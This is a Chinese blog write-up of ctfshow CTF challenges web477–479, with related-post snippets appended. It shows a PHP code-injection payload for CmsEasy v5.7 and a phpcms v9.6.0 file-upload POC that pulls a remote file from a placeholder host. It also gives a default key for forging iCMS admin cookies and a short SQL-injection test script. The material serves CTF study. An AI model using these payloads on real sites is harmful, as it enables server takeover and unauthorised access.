ctfshow CMS系列writeup(web477-web479)

最新推荐文章于 2024-08-04 01:03:52 发布
最新推荐文章于 2024-08-04 01:03:52 发布
阅读量5.9k 收藏 7
点赞数 4
分类专栏: CTF 文章标签: web安全 信息安全 安全漏洞
如需转载请于主页联系,得到允许方可实施
本文链接:https://blog.csdn.net/m0_60988110/article/details/122601605
版权
本文介绍针对CmsEasy v5.7及phpcmsv9.6.0系统的漏洞利用过程,包括RCE远程代码执行、任意文件上传等技术细节,并分享了iCMS 7.0.1版本中SQL注入漏洞的解决思路。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

0x01 Web 477

打开页面发现是CmsEasy建站系统,题目提示RCE,百度寻找对应相关漏洞,多方查找后发现版本是v5.7,找到对应版本后进行搜索就变得很简单了。

找登录后台,/admin进入登录窗,然后小手一敲弱口令admin:admin进入后台,有点沙雕.......

忘记密码好像是存在洞的,重置完默认账号密码才会是admin:admin。因为这里默认admin就可以登录进去,漏洞存在与否不好验证,有兴趣的童鞋可以找找。

CmsEasy_v5.7 漏洞测试 - 云+社区 - 腾讯云

漏洞点在于模板-自定义标签部分,使用的payload: 1111111111";}<?php phpinfo()?>

 因为不知道它在哪里RCE,于是都填写payload进行攻击,打击预览,CRTL+F搜索ctfshow找到flag

payload构造这个东西涉及到代码审计,所以触及到我的知识盲区,唯一能感受到的是前面闭合,后面命令执行,如果有懂原理的朋友可以讲一讲。

 0x02 Web 478

按照题目提示安装cms系统

 CMS版本是phpcms v9.6.0,安装完成后访问页面如下图所示

题目提示为文件上传,搜索相关漏洞,FreeBuf找到文章

PHPCMS v9.6.0 任意文件上传漏洞分析 - FreeBuf网络安全行业门户

上传点问题处在注册部分,进行复现

 经我测试,按照抓包内容进行修改直接发包是不行的。

所以这里的poc就按照Freebuf上复制粘贴进行对应修改即可

siteid=1&modelid=11&username=test452&password=test2123&email=test2154@163.com&info[content]=<img src=http://xx.xx.xx.xx/1.txt?.php#.jpg>&dosubmit=1&protocol=

这里有两个注意点,第一个经测试不可以直接写php文件,发包后网页可以访问,但是会有问题,一句话不能执行,所以写txt;第二点,如果失败多记尝试几次,发包时记得修改邮箱、账号的值。

至于payload构造原理,涉及到代码审计,给出链接,可以自行参考学习。

PHP-code-audit/phpcmsv9.6.0 任意文件上传漏洞.md at master · jiangsir404/PHP-code-audit · GitHub

 flag在根目录,提交即可。

 0x03 Web 479

他喵的这道题可以说flag和sql注入没有毛关系.......

查找资料icms sql注入点是后台处 /admincp.php,但是搜索过后发现该cms不存在默认账号密码,尝试登录失败。于是查看hint,提示:默认key:n9pSQYvdWhtBz3UHZFVL7c6vf4x6fePk,key伪造。

因触及到知识盲区,询问大哥,一番讲解,恍然大悟,要挖洞洞在后台,后台进不去通过默认key伪造cookie登进后台,百度一番,在github上找到Y4tacker生成cookie脚本,链接如下:

https://github.com/Stakcery/Web-Security/blob/4aac5ffb955667b15ee3110fb99f6df1016c6760/%E6%A1%86%E6%9E%B6%E6%BC%8F%E6%B4%9EAndCMS%E5%AE%A1%E8%AE%A1/CMS/iCMS/iCMS-7.0.1%E5%89%8D%E5%8F%B0%E7%99%BB%E5%BD%95%E7%BB%95%E8%BF%87%E5%88%86%E6%9E%90/1.md

根据poc生成值

 登录伪造,进入后台,发现flag

0x04 总结

CMS系列仔细想了想,决定停手。原本认为找到CMS对应版本漏洞直接打就行,做了几题感觉效果是有但终究还是舍本逐末,还是得懂代码审计再进行操作对于技术来讲比较有意义。

ctfshow-web477(CMS)
m0_62094846的博客
09-13 846
这个网站是用cmseasy搭建的,找一下cmseasy漏洞。网页是这样的,刚好和题目的网站对应上,版本是5.7。要进入管理界面,试一下在url后面输入admin。试用admin admin账号密码登录,成功。这里要在模块里面点编辑模块,这里没有。可能是版本不对 这里要7.3.8。1.试一下任意文件操作。再试一下代码执行漏洞。
ctfshow复现2024ciscn第一场web
最新发布
2301_81133475的博客
01-16 1164
本章内容均在ctfshow复现图片若显示失败请参考我的blog👇。
CTFshow baby杯wp
灰太的表格的博客
06-23 619
baby_captcha 点击无脑,会给一个字典。爆破 admin fire ctfshowcms index.php里有个包含 /install/index.php里是个重新安装的操作,但是有锁。这里可以用存在include的界面将这个页面包含进来。再进行重新安装。这段代码有个连接数据库的操作,我们可以用这点来构造一个恶意的mysql客户端来进行任意文件读取。 原理看这:https://www.modb.pro/db/51823 主要这个: 恶意脚本:https://github.com/Moro
ctfshow web入门 CMS web477--web479
2301_81040377的博客
07-29 583
不让扫,那就尝试一下admin路由,成功了admin登录进入后台也看到了其实首页可以看到提示然后去自定义标签打刷新一下预览即可也可以getshell能造成这些漏洞看了一下是因为之前此处填充的内容是反序列化存储的,但是我们如果使用就可以将其提前闭合从而达到命令执行的目的。
ctf.showCMS(web477-web478)
wanan的博客
08-31 1527
ctf.showCMS(web477-web478)
【CTF】ctfshow——web
m0_52923241的博客
09-19 3482
ctfshowweb通关web签到题(so easy)web2:SQL注入漏洞(联合查询)web3:文件包含漏洞web4:文件包含漏洞(日志注入)web5:md5绕过web6:SQL注入漏洞(空格被过滤)web7:SQL注入漏洞(盲注&sqlmap)布尔盲注sqlmapweb8:SQL注入漏洞(布尔盲注)web9:robots.txt + SQL注入 + md5web10web11:web12 web签到题(so easy) base64解码点这里 F12,看到有一串字符串,base64解码
CTF show WEB5
羽的博客
02-15 2885
考察md5绕过,要求v1为为字母,v2为数字,并且v1与v2的md5值相同。 md5漏洞介绍: PHP在处理哈希字符串时,它把每一个以“0E”开头的哈希值都解释为0 所以只要v1与v2的md5值以0E开头即可。 v1=QNKCDZO&v2=240610708 这里附上常见的0E开头的MD5 0e开头的md5和原值: QNKCDZO 0e830400451993494058024219903...
CTF show WEB 1-4
羽的博客
02-15 7120
1.web签到题 直接源代码查看 2.web2 直接尝试万能密码,登陆成功 order by查找回显数 在3时正常回显,4是无回显,说明回显数为3 使用union select 联合查询爆库名 爆表名 爆字段 爆flag值 ...
ctfshow解题,知识点学习
Z11762的博客
06-04 1284
,当我们按照pwd排序时,比如 flag用户的密码为flag{123},我们从小到大 一直到f都在他的上面,当我们注册的密码为g时,则出现第一个在下面的。函数可以来读取flag.所以这题主要思路就是构造序列化串利用服务器处理器不同造成的安全问题通过 PHP_SESSION_UPLOAD_PROGRESS来提交我们的序列化串。换句话说,它将用户输入的密码转换为 MD5 散列值,并将该散列值填充到密码输入框中,顺序大致是这样,这时我们就可以判断密码的第一个字符为f,这里还是用python代码比较快,
CTFShow-Web入门
weixin_58546222的博客
12-15 972
CTFShow爆破解题思路
i 春秋CTF题目 百度杯 9月场 再见CMS Upload 复现
AAAAAAAAAAAA66的博客
12-24 1688
今天花了点时间刷了下题目,遇到几道相对来说进阶的题目,学习一下储备一些CTF思路,这些题。。脑洞有点开。 再见CMS 昨天刚做一道 [WEB攻防] i春秋- “百度杯”CTF比赛 十二月场-YeserCMS cmseasy CmsEasy_5.6_20151009 无限制报错注入 复现过程_AAAAAAAAAAAA66的博客-CSDN博客 今天继续按着套路来 直接在线CMS指纹识别 百度找到payload ,都是些过了很久的漏洞了 这里简单知道是一个注入漏洞就行了,我们的目的是照着pa
[MTCTF]从出题人视角看ez_cms
Y4tacker的博客
05-23 1521
文章目录写在前面DockerhubWp 写在前面 太惨了,太傻了我,迷迷糊糊写了两天CMS,又累又自闭,还搞错了东西,给各位大师傅们道歉了,下面大师傅们要是瞧得上的化就那啥可以复现复现 Dockerhub docker pull y4tacker/ez_yxcms:1.0 随便写个docker-compose.yml version: "2" services: web: build: . image: yyds restart: always ports:
常见的CMS漏洞解析!
muyuchen110的博客
08-04 2633
【代码】常见的CMS漏洞解析!
CMS漏洞总结
include_voidmain的博客
08-01 5026
CMS漏洞总结
web安全-文件上传漏洞-CMS及CVE编号文件上传漏洞测试以及实例讲解
ran的博客
01-27 2057
可以看到访问后可以实现上图所示的效果,因为我们这里上传的是普通图片,不是jsp代码,所以网页返回的是一堆乱码,如果我们上传的文件是jsp文件,网页就会返回isp代码执行后的内容。在网址内添加此路径进行搜索,在回显的页面内可以看到上传的文件成功以php的形式进行了执行(因为这里上传的是图片,且没有进行修改,所以返回的全部是乱码)。将“png”改为“php”后放包,正常在上传完文件之后,会返回一个文件的地址,但是这里地址没有显示,并出现了报错。按照搜索到的方法,将“png”改为“php”后放包。
常见的CMS漏洞
lhdbk______的博客
08-03 1115
常见的CMS漏洞
CMS漏洞(发货100CMS、SHECMS、ZHCMS、MACCMS)详解实战
xinyue9966的博客
02-18 9018
CMS漏洞发货100CMS(弱口令)介绍系统版本靶场搭建漏洞复现修复方案SHECMS(SQL注入)介绍系统版本靶场搭建漏洞复现修复方案ZHCMS(文件上传)介绍系统版本靶场搭建漏洞复现修复方案MACCMS(CNVD-2019-43865)介绍系统版本靶场搭建漏洞复现修复方案 发货100CMS(弱口令) 介绍 弱口令漏洞 由于网站用户帐号存在弱口令,导致攻击者通过弱口令可轻松登录到网站中,从而进行下一步的攻击,如上传webshell,获取敏感数据。另外攻击者利用弱口令登录网站管理后台,可执行任意管理员的操作
cms漏洞挖掘分析
yyyyyybw的博客
10-06 283
cms漏洞挖掘分析,该系统代码简单,因此注入漏洞发现过程还是挺顺利的,就在index.php的文件中,结果绕过waf稍微有些曲折,特此记录一下学习过程。
CMS漏洞复现
热门推荐
qq_44832048的博客
07-19 1万+
dedeCMS (CNVD-2018-01221) 类型: php类cms系统:dedecms、帝国cms、php168、phpcmscmstop、discuz、phpwind等asp类cms系统:zblog、KingCMS等国外的著名cms系统:joomla、WordPress 、magento、drupal 、mambo。 dedeCMS (CNVD-2018-01221) 漏洞简介...
CTFSHOW-web-web4
12-27
### CTF SHOW Web 类别挑战资源与解决方案 对于参与CTF SHOW平台上Web类别的挑战,特别是针对`web4`这一具体题目,可以借鉴一些通用的Web安全漏洞利用技巧以及特定于该平台的经验分享。通常情况下,这类挑战会涉及到常见的Web应用程序漏洞,如SQL注入、跨站脚本攻击(XSS)、文件包含漏洞(LFI/RFI)等。 为了更好地理解和解决这些挑战,可以从以下几个方面入手: #### 学习基础理论和技术 深入理解HTTP协议的工作原理及其请求响应机制是非常重要的。掌握如何通过浏览器开发者工具分析网络流量可以帮助识别潜在的安全问题[^1]。 #### 利用在线学习资源 有许多优质的网站提供了关于Web渗透测试的学习材料和实践环境,例如OWASP Top Ten项目文档,它列举并解释了当前最严重的Web应用风险;还有像PortSwigger Academy这样的平台提供了一系列课程来教授各种类型的Web漏洞挖掘方法。 #### 参考社区讨论和Writeup 加入相关的技术论坛或社交媒体群组,在那里可以看到其他参赛者发布的writeups(解题报告),这对于获取灵感非常有帮助。GitHub上也有很多开源仓库专门收集整理了不同赛事下的高质量writeup链接集合。 ```python import requests def check_sql_injection(url, param): test_payload = "' OR '1'='1" data = {param: test_payload} response = requests.post(url, data=data) if "Welcome" in response.text: print(f"[+] SQL Injection vulnerability detected on parameter '{param}'!") else: print("[-] No SQL Injection found.") ```
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值